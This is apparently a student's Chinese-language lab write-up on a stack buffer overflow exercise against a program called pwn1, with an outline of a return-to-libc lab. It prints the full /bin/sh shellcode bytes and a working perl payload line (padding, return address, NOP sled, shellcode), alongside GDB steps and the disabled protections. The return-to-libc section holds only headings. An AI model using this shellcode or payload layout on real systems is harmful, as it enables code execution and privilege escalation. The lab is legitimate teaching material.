shellcode

准备一段Shellcode

我用的老师的shellcode：\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00

环境设置

• 设置堆栈可执行
• 关闭地址随机化
  

然后，跳进了坑里

• 用结构为：nops+shellcode+retaddr进行了shellcode注入
• 6个nop+shellcode+返回地址，返回地址先用\x4\x3\x2\x1代替，之后确定具体值
• 准备好了注入文件用00结尾
• 然后把shellcode注入pwn1
  

确定注入的shellcode的地址

• 打开一个新的终端，进行GDB调试
• 设置断点
• 寻找esp指向的地址
• 在附近寻找shellcode的地址
• 然后继续执行，确定返回地址所占的位置是否正确

失败了

然后，把\x4\x3\x2\x1替换为内存中shellcode的地址
注入后运行shell，失败，原因是指令被覆盖了

从坑里爬起来继续

• 这次构造的是结构为：anything+retaddr+nops+shellcode
• perl -e 'print "A" x 32;print "\x30\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
• 成功
  

Return-to-libc攻击实验

准备工作，使用另一个 shell 程序（zsh）代替/bin/bash。

漏洞程序

• retlib
  
• 编译该程序，并设置 SET-UID
  

读取环境变量的程序

攻击程序

获取内存地址

gdb 获得 system 和 exit 地址

修改 exploit.c 文件，填上刚才找到的内存地址

攻击